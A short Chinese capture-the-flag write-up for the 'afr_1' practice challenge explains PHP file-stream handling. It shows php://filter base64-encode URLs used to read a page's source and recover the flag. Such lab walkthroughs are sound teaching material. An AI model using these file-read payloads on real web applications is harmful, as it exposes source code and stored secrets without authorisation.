《从0到1:CTFer成长之路》afr_1
靶场:afr_1
知识点
- PHP向用户提供的指定待打开文件的方式,是一个文件流
- PHP的Filter机制,可对目前的协议进行一定的处理,比如将当前文件流的内容进行Base64编码。
http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd
- 利用Filter机制,构造形如以上的攻击数据可以读取文件,拿到各种文件的源码
解题过程
- 首页
http://c31a4949-59d4-407e-ac06-ca7850b56265.node4.buuoj.cn:81/?p=hello
2. 使用
php://filter
读取源代码并进行base64编码输出
http://c31a4949-59d4-407e-ac06-ca7850b56265.node4.buuoj.cn:81/?p=php://filter/convert.base64-encode/resource=flag
PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
- 使用base64解码
<?php
die('no no no');
//n1book{afr_1_solved}